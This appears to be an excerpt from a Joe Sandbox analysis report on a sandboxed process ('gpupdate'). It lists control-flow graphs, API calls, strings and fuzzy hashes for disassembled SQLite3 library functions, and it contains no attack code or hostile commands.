                                              control_flow_graph 371 61e679bd-61e679dc call 61e22b8e 374 61e679de-61e679e8 call 61e22948 371->374 375 61e679ed-61e67a06 sqlite3_mutex_enter call 61e0afda 371->375 382 61e67c7e-61e67c85 374->382 379 61e67a0b-61e67a0e 375->379 380 61e67a14-61e67a41 sqlite3_prepare_v2 379->380 381 61e67bf8-61e67c01 379->381 384 61e67a47-61e67a4b 380->384 385 61e67c03 380->385 383 61e67c0a-61e67c0f 381->383 386 61e67c16-61e67c2d call 61e0a13a call 61e0f2f2 383->386 387 61e67c11 call 61e4d5ab 383->387 388 61e67a52-61e67a62 384->388 389 61e67a4d-61e67a50 384->389 385->383 408 61e67c62-61e67c66 386->408 409 61e67c2f-61e67c33 386->409 387->386 391 61e67a69-61e67a7a sqlite3_step 388->391 389->379 393 61e67a80-61e67a83 391->393 394 61e67bb8-61e67bbb 391->394 396 61e67a85-61e67a88 393->396 397 61e67aa1-61e67aa3 393->397 394->391 398 61e67bc1-61e67bce call 61e4d5ab 394->398 396->398 400 61e67a8e-61e67a90 396->400 403 61e67b04-61e67b15 397->403 404 61e67aa5-61e67ab1 397->404 417 61e67bd5-61e67bdf 398->417 400->398 406 61e67a96-61e67a9a 400->406 405 61e67b18-61e67b1b 403->405 410 61e67ab3-61e67aba 404->410 411 61e67abd-61e67ad5 call 61e13c8f 404->411 414 61e67b67-61e67b6d 405->414 415 61e67b1d-61e67b3a sqlite3_column_text 405->415 406->404 416 61e67a9c 406->416 412 61e67c71-61e67c7c sqlite3_mutex_leave 408->412 413 61e67c68-61e67c6b 408->413 409->408 418 61e67c35-61e67c4d sqlite3_errmsg call 61e15ea8 409->418 410->411 411->383 427 61e67adb 411->427 412->382 413->412 425 61e67b74-61e67b8f call 61e778fa 414->425 420 61e67b64-61e67b65 415->420 421 61e67b3c-61e67b51 sqlite3_column_type 415->421 416->398 422 61e67be4-61e67bf0 call 61e0a13a 417->422 423 61e67be1-61e67be2 417->423 418->412 434 61e67c4f-61e67c60 call 61e0afda 418->434 420->405 421->420 428 61e67b53-61e67b5f call 61e0f22d 421->428 422->379 440 61e67bf6 422->440 423->417 435 61e67b92-61e67b94 425->435 431 61e67add-61e67ae0 427->431 428->383 437 61e67ae2-61e67af8 sqlite3_column_name 431->437 438 61e67afa-61e67b02 431->438 434->412 435->394 436 61e67b96-61e67bb6 call 61e4d5ab call 61e0afda 435->436 436->383 437->431 438->403 438->425 440->385
                                              APIs
                                                • Part of subcall function 61E22B8E: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E22BD2
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E679FD
                                              • sqlite3_prepare_v2.SQLITE3 ref: 61E67A38
                                              • sqlite3_step.SQLITE3 ref: 61E67A6F
                                              • sqlite3_errmsg.SQLITE3 ref: 61E67C38
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E67C77
                                                • Part of subcall function 61E22948: sqlite3_log.SQLITE3 ref: 61E22971
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_mutex_leavesqlite3_prepare_v2sqlite3_step
                                              • String ID: d$d
                                              • API String ID: 2909166478-195624457
                                              • Opcode ID: 3d5255eb90fae1390b5671d9a99b0992c65b69c85a20b26beed28b672400681a
                                              • Instruction ID: ae4119a044f8ba5d443569cf5eb4333e7679eec12d97c3df147bfb1443ad3803
                                              • Opcode Fuzzy Hash: 3d5255eb90fae1390b5671d9a99b0992c65b69c85a20b26beed28b672400681a
                                              • Instruction Fuzzy Hash: 22812B70E4464ACBDB01DFA9C48079EBBF5AF89748F60C429E865A7340DB78D942CBD1
                                              Function 61E67D60 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 234COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 448 61e67d60-61e67e01 call 61e778fa 451 61e67e07-61e67e1e 448->451 452 61e6804f-61e68053 448->452 455 61e67e20-61e67e28 451->455 456 61e67e2d-61e67e40 call 61e17a8a 451->456 453 61e68055-61e6805c 452->453 454 61e6805e-61e68060 call 61e0f22d 452->454 453->454 457 61e68065-61e6806f call 61e19c9a 453->457 454->457 459 61e68083-61e68097 455->459 464 61e67e42-61e67e46 call 61e44098 456->464 465 61e67e71-61e67e74 456->465 457->459 469 61e67e4b-61e67e56 464->469 466 61e67e7b-61e67e92 call 61e17d8b 465->466 472 61e67e94-61e67e98 466->472 469->465 471 61e67e58-61e67e6c call 61e0cfe7 call 61e15fcb 469->471 486 61e68041-61e6804d call 61e0b721 471->486 474 61e67ea6-61e67eb3 472->474 475 61e67e9a-61e67ea4 472->475 478 61e67ee5-61e67ef5 474->478 479 61e67eb5-61e67eb9 474->479 475->474 480 61e67f16-61e67f26 478->480 481 61e67ef7-61e67f11 call 61e01e49 call 61e18176 478->481 483 61e67ed5-61e67ee3 479->483 484 61e67ebb-61e67ebf 479->484 487 61e67f2c-61e67f33 480->487 488 61e67f28 480->488 481->480 483->478 490 61e67f3a-61e67f4f call 61e15fcb 483->490 484->483 489 61e67ec1-61e67ed3 call 61e16b2a 484->489 486->452 486->459 493 61e67f35 487->493 494 61e67f5a-61e67f5d 487->494 488->487 489->478 504 61e67f55-61e68079 call 61e0b721 490->504 505 61e68039-61e6803c call 61e49f72 490->505 493->490 500 61e67f5f-61e67f63 494->500 501 61e67f6d-61e67fe5 call 61e27a8a sqlite3_exec call 61e0a13a 494->501 500->501 506 61e67f65-61e67f69 500->506 512 61e67fea-61e67fec 501->512 504->452 505->486 506->501 514 61e67fee-61e67ff3 call 61e67c86 512->514 515 61e67ff8-61e67ffc 512->515 514->515 517 61e67ffe-61e6800a call 61e19cf3 515->517 518 61e6800c-61e6800e 515->518 521 61e6802a-61e6802e 517->521 520 61e68010-61e68026 518->520 518->521 523 61e6807b-61e6807e call 61e0b721 520->523 524 61e68028 520->524 521->520 525 61e68030-61e68037 521->525 523->459 524->505 525->486 525->505
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format$*a
                                              • API String ID: 0-3689458721
                                              • Opcode ID: aa8b780f54c3ce69655204e0407ab7220bfb703e1fa81365970616a285c89593
                                              • Instruction ID: 9e3e14c71adc2254c0b7526fd36b71c8a25fb5e831f9fb2f1c790918a3c4d990
                                              • Opcode Fuzzy Hash: aa8b780f54c3ce69655204e0407ab7220bfb703e1fa81365970616a285c89593
                                              • Instruction Fuzzy Hash: 64A11274E443498BEB20CFA9C480B89BBF5BB89318F64C56DD858AB346D774D885CF81
                                              Function 61E778FA Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 136COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 527 61e778fa-61e7791f 528 61e77935-61e77937 527->528 529 61e77921-61e77930 call 61e27aa0 527->529 531 61e77aa4 528->531 532 61e7793d-61e77941 528->532 533 61e77aa6-61e77aaf 529->533 531->533 535 61e77943-61e77946 532->535 536 61e7794b-61e77970 sqlite3_strnicmp 532->536 537 61e77a42-61e77a44 535->537 538 61e77976-61e779d0 call 61e0673a call 61e76981 536->538 539 61e77a32-61e77a37 536->539 542 61e77a9c-61e77a9f call 61e27aa0 537->542 549 61e779d5-61e779e3 538->549 539->537 541 61e77a39-61e77a3b 539->541 544 61e77a46-61e77a5c call 61e0c692 541->544 545 61e77a3d-61e77a40 541->545 542->531 553 61e77a5e-61e77a6b call 61e06616 544->553 554 61e77a8d-61e77a92 544->554 545->537 545->544 551 61e77a25-61e77a30 sqlite3_finalize 549->551 552 61e779e5-61e779ec 549->552 551->533 552->551 556 61e779ee-61e779f4 552->556 563 61e77a94 553->563 564 61e77a6d-61e77a73 553->564 555 61e77a99 554->555 555->542 558 61e779f6 556->558 559 61e779f9-61e779fc 556->559 558->559 561 61e77a07-61e77a0a 559->561 562 61e779fe-61e77a05 call 61e0f22d 559->562 561->551 567 61e77a0c-61e77a0e 561->567 562->551 563->555 564->563 566 61e77a75-61e77a78 564->566 569 61e77a7b-61e77a7d 566->569 567->551 570 61e77a10-61e77a20 sqlite3_errmsg call 61e27aa0 567->570 569->531 571 61e77a7f-61e77a82 569->571 570->551 573 61e77a84-61e77a86 571->573 574 61e77a88-61e77a8b 571->574 573->563 573->574 574->569
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$invalid rootpage$orphan index
                                              • API String ID: 0-2399666622
                                              • Opcode ID: 85f9fd8dad58864ba544696bee7aae2001d8c828d20db630896855b1b23efda7
                                              • Instruction ID: f0eafa58cf32e0137621cfa1675f480991484625cbb67438f525f3eea3199fb3
                                              • Opcode Fuzzy Hash: 85f9fd8dad58864ba544696bee7aae2001d8c828d20db630896855b1b23efda7
                                              • Instruction Fuzzy Hash: BA512B74A043418FFB24DFA8C484B5A7BF1EF89318F29C569E8998B355D730E942CB51
                                              Function 61E44098 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 458COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 575 61e44098-61e440c2 call 61e17a8a 578 61e44645-61e44649 575->578 579 61e440c8-61e440ca 575->579 580 61e4465b-61e4465f 578->580 581 61e4464b-61e44659 578->581 582 61e440d6-61e440df 579->582 583 61e440cc-61e440d0 579->583 584 61e44661-61e44663 580->584 585 61e4466b-61e4467c 580->585 581->580 586 61e440e1-61e440e8 582->586 587 61e440ef-61e440f4 582->587 583->578 583->582 591 61e44695-61e446a6 call 61e0b721 584->591 585->584 592 61e4467e-61e44682 585->592 586->587 588 61e440ea 586->588 589 61e440f6-61e440ff 587->589 590 61e44107-61e4410b 587->590 588->587 589->591 594 61e44105 589->594 595 61e44113-61e44115 590->595 596 61e4410d-61e44111 590->596 592->584 597 61e44684-61e4468b call 61e16fee 592->597 594->595 599 61e44117-61e4411c 595->599 600 61e4411e-61e44122 595->600 596->595 596->599 597->591 602 61e4413b-61e44142 599->602 603 61e44124 600->603 604 61e44148-61e4415e call 61e0290b 600->604 602->591 602->604 607 61e44127-61e44129 603->607 604->591 610 61e44164-61e44172 604->610 607->604 609 61e4412b-61e44130 607->609 611 61e44136-61e44139 609->611 612 61e44132-61e44134 609->612 613 61e44174-61e44177 610->613 614 61e4417b-61e44180 610->614 611->607 612->602 613->614 615 61e44183-61e44187 614->615 616 61e44406-61e44408 615->616 617 61e4418d-61e44198 call 61e43176 615->617 619 61e4440e-61e44412 616->619 620 61e44578-61e4457a 616->620 617->616 626 61e4419e-61e441af call 61e02ced 617->626 619->620 622 61e44418-61e4441c 619->622 623 61e44585-61e44587 call 61e42f68 620->623 624 61e4457c-61e4457e 620->624 627 61e44580 622->627 628 61e44422-61e4442a 622->628 629 61e4458c-61e44590 623->629 624->629 638 61e441b4-61e441b8 626->638 627->623 633 61e44430-61e44444 628->633 634 61e4454d-61e44553 628->634 630 61e445b1-61e445b3 629->630 631 61e44592-61e44596 629->631 630->591 637 61e445b9-61e445c0 630->637 631->591 635 61e4459c-61e445a6 call 61e0527a 631->635 639 61e44569-61e4456d 633->639 640 61e4444a-61e44452 633->640 634->623 636 61e44555-61e44567 634->636 635->615 659 61e445ac 635->659 636->623 642 61e445e0-61e445f2 637->642 643 61e445c2-61e445c9 637->643 638->616 645 61e441be-61e441db 638->645 639->624 644 61e4456f-61e44576 call 61e43fe0 639->644 646 61e44521-61e44534 call 61e1a7d6 640->646 647 61e44458-61e4445f 640->647 651 61e445f4 642->651 652 61e445f7-61e445fb 642->652 643->642 649 61e445cb-61e445dd 643->649 644->620 653 61e44202 645->653 654 61e441dd-61e44200 memcmp 645->654 670 61e44536-61e44538 646->670 671 61e44549-61e4454b 646->671 655 61e44461-61e44465 647->655 656 61e44498-61e444a5 647->656 649->642 651->652 662 61e44601-61e44614 652->662 663 61e4468d-61e44691 652->663 664 61e44205-61e4420f 653->664 654->664 655->656 665 61e44467-61e44477 call 61e1a7d6 655->665 656->627 660 61e444ab-61e444bd call 61e0b6a9 656->660 659->591 660->634 688 61e444c3-61e444e5 memcmp 660->688 673 61e44616 662->673 674 61e44619-61e44628 662->674 663->581 666 61e44693 663->666 667 61e44215-61e44219 664->667 668 61e4437b 664->668 665->634 685 61e4447d-61e44494 call 61e0b687 665->685 666->584 675 61e44382-61e443da 667->675 676 61e4421f-61e44239 memcmp 667->676 668->675 670->671 680 61e4453a-61e44547 call 61e1a825 670->680 671->634 681 61e444e7-61e4450b 671->681 673->674 678 61e44665-61e44669 674->678 679 61e4462a-61e44636 call 61e41bdf 674->679 675->615 683 61e443df 676->683 684 61e4423f-61e44243 676->684 678->581 678->585 679->591 698 61e44638-61e44643 679->698 680->671 681->639 689 61e443e4-61e443fc call 61e42f41 683->689 690 61e44245 684->690 691 61e4424a-61e4424e 684->691 685->656 688->681 695 61e4450d-61e4451f call 61e0b704 688->695 705 61e443fe-61e44400 689->705 690->691 691->683 699 61e44254 691->699 695->636 698->678 702 61e44256-61e4425a 699->702 703 61e44290-61e442ad memcmp 699->703 702->703 706 61e4425c-61e44272 call 61e9942f 702->706 703->683 707 61e442b3-61e442ce 703->707 705->615 705->616 706->689 714 61e44278-61e4427c 706->714 707->683 708 61e442d4-61e442df 707->708 708->683 710 61e442e5-61e442fe 708->710 712 61e44300-61e4432e call 61e42f41 call 61e0b7e9 call 61e18666 710->712 713 61e44333-61e4433f 710->713 712->705 716 61e44341-61e44347 713->716 717 61e4435a-61e44361 713->717 714->703 718 61e4427e-61e4428b call 61e42f41 714->718 716->717 720 61e44349-61e44355 call 61e209ff 716->720 717->683 722 61e44363-61e44379 717->722 718->615 720->689 722->675
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: memcmp$sqlite3_mutex_try
                                              • String ID: 0
                                              • API String ID: 2794522359-4108050209
                                              • Opcode ID: 8e5061e356b1831dba3342f86f875a4df026be58cdcfeed261a0ce5eea88436a
                                              • Instruction ID: 39ea78dfdf03af7b003317dfab9816dc37a6b451422cd06c3787e5ee585dc095
                                              • Opcode Fuzzy Hash: 8e5061e356b1831dba3342f86f875a4df026be58cdcfeed261a0ce5eea88436a
                                              • Instruction Fuzzy Hash: 8B127A70B05259DFDB01CFA8E484B89BBF1BF48318F25C1AAE844AB755D774E885CB81
                                              Function 61E685F1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 170COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 733 61e685f1-61e68608 734 61e68621 call 61e6812b 733->734 735 61e6860a-61e68619 call 61e03ac3 733->735 739 61e68626-61e68628 734->739 740 61e6861f 735->740 741 61e687c9-61e687cd 735->741 739->735 742 61e6862a 739->742 743 61e6862f-61e68633 740->743 744 61e6882f-61e68836 741->744 745 61e687cf-61e687d3 741->745 746 61e6880e-61e68810 742->746 748 61e687bd-61e687c1 743->748 749 61e68639-61e6864b call 61e01f95 743->749 745->744 747 61e687d5-61e687ea 745->747 746->744 751 61e68812-61e6882d call 61e23392 747->751 752 61e687ec-61e68809 call 61e23392 747->752 748->746 750 61e687c3-61e687c7 748->750 757 61e686b1-61e686c1 749->757 758 61e6864d-61e6866a sqlite3_strnicmp 749->758 750->747 751->746 752->746 760 61e686c3-61e686c6 757->760 761 61e686cb-61e686d3 757->761 758->748 762 61e68670-61e6867d call 61e03f9a 758->762 760->744 763 61e686d5-61e686db 761->763 764 61e686e1-61e686f6 call 61e13eee 761->764 762->748 769 61e68683-61e68687 762->769 763->748 763->764 764->748 771 61e686fc-61e6870b call 61e15ea8 764->771 769->748 770 61e6868d-61e686ab call 61e19d7e 769->770 770->748 770->757 776 61e6871c-61e6878a call 61e15ea8 call 61e2354f * 2 call 61e15ea8 call 61e2354f call 61e27b4d 771->776 777 61e6870d-61e68717 call 61e0a13a 771->777 776->760 792 61e68790-61e687b8 call 61e23392 call 61e0a13a call 61e19d5c 776->792 777->748 792->748
                                              APIs
                                              • sqlite3_strnicmp.SQLITE3 ref: 61E68663
                                                • Part of subcall function 61E03F9A: sqlite3_stricmp.SQLITE3 ref: 61E03FCF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_stricmpsqlite3_strnicmp
                                              • String ID: >,a$no such table$no such view
                                              • API String ID: 456569458-3276477157
                                              • Opcode ID: 3ef8bdb80dd54f008a98b98bb99aaf4ef5b868c2c4a1e81120778ff98a1d93bf
                                              • Instruction ID: 32e9799e651fdc1bece4204d98e9d1bdd014fe97e5eaa02c362b9beb616fb852
                                              • Opcode Fuzzy Hash: 3ef8bdb80dd54f008a98b98bb99aaf4ef5b868c2c4a1e81120778ff98a1d93bf
                                              • Instruction Fuzzy Hash: CB612470A483469BDB04DFA9D490B5EBBF6AF89308F64C42DE858DB350DB34E851DB81
                                              Function 61E2E6D9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 798 61e2e6d9-61e2e701 799 61e2e703 798->799 800 61e2e74b-61e2e76a 798->800 802 61e2e705-61e2e708 799->802 803 61e2e70a-61e2e719 799->803 801 61e2e76d-61e2e794 ReadFile 800->801 804 61e2e796-61e2e7a9 call 61e20876 801->804 805 61e2e7af-61e2e7b8 801->805 802->800 802->803 806 61e2e71b 803->806 807 61e2e72e-61e2e748 803->807 811 61e2e7ab-61e2e7ad 804->811 814 61e2e7ee-61e2e7fa 804->814 805->804 816 61e2e7ba-61e2e7c7 call 61e2dd21 805->816 808 61e2e721-61e2e72c 806->808 809 61e2e71d-61e2e71f 806->809 807->800 808->811 809->807 809->808 815 61e2e7ff-61e2e806 811->815 814->815 816->801 819 61e2e7c9-61e2e7ec call 61e2dff6 816->819 819->815
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: winRead
                                              • API String ID: 2738559852-2759563040
                                              • Opcode ID: 7f4688b082b9755c1af3b6a371517c7d3e8a138ad266e80f8bae9a01e21b9fe2
                                              • Instruction ID: 29c1b4e8a4c5ed56108877de060d3f26d6599f926b0d5861dd849deb481b349f
                                              • Opcode Fuzzy Hash: 7f4688b082b9755c1af3b6a371517c7d3e8a138ad266e80f8bae9a01e21b9fe2
                                              • Instruction Fuzzy Hash: 7D41E575A01669DFCF04DFAAD8A058EBBF2FF88314F25C529E814A7344D730E9518B91
                                              Function 61E17114 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 822 61e17114-61e17138 823 61e1713a call 61e016d8 822->823 824 61e1713f-61e17147 call 61e16cd5 822->824 823->824 827 61e1714c-61e17152 824->827 828 61e17154 call 61e016e9 827->828 829 61e17159-61e1715b 827->829 828->829 830 61e171a5-61e171ac 829->830 831 61e1715d-61e17162 829->831 833 61e17165-61e1716b 831->833 834 61e17194-61e171a2 sqlite3_free 833->834 835 61e1716d 833->835 834->830 836 61e17170-61e17172 835->836 837 61e17191-61e17192 836->837 838 61e17174-61e1718f 836->838 837->833 838->836
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free
                                              • String ID: Pa
                                              • API String ID: 2313487548-3991404076
                                              • Opcode ID: 5574d78806370a6b886c9aacd49242c19e7b8ceb093c636fe5255565c734a06f
                                              • Instruction ID: ccf328f17c3f8f771bbba98c0d97a051d380f0d5a62fb52c5e7eeca4119748f0
                                              • Opcode Fuzzy Hash: 5574d78806370a6b886c9aacd49242c19e7b8ceb093c636fe5255565c734a06f
                                              • Instruction Fuzzy Hash: 89119370F052068FDF04CFA9C4819AABBFAEF8C708B658069D8159F309D731D842CB90
                                              Function 61E11C21 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 839 61e11c21-61e11c37 840 61e11d4b 839->840 841 61e11c3d-61e11c43 839->841 843 61e11d4d-61e11d54 840->843 841->840 842 61e11c49-61e11c52 841->842 844 61e11d40-61e11d49 842->844 845 61e11c58-61e11c76 sqlite3_mutex_enter 842->845 844->843 848 61e11c78 845->848 849 61e11c7e-61e11c8c 845->849 848->849 850 61e11c95-61e11cb0 849->850 851 61e11c8e 849->851 854 61e11cf2 850->854 855 61e11cb2 850->855 852 61e11c90-61e11c93 851->852 853 61e11cfc-61e11cff call 61e209b5 851->853 852->850 852->853 858 61e11d05-61e11d09 853->858 854->853 856 61e11cb4-61e11cb6 855->856 857 61e11cb8-61e11cd6 call 61e09fd1 855->857 856->854 856->857 857->853 864 61e11cd8-61e11ce8 857->864 860 61e11d0b-61e11d2b call 61e0178f call 61e0149c * 2 858->860 861 61e11d2f-61e11d3e sqlite3_mutex_leave 858->861 860->861 861->843 866 61e11cea 864->866 867 61e11d2d 864->867 866->853 868 61e11cec-61e11cee 866->868 867->861 868->867 870 61e11cf0 868->870 870->853
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E11C60
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E11D37
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
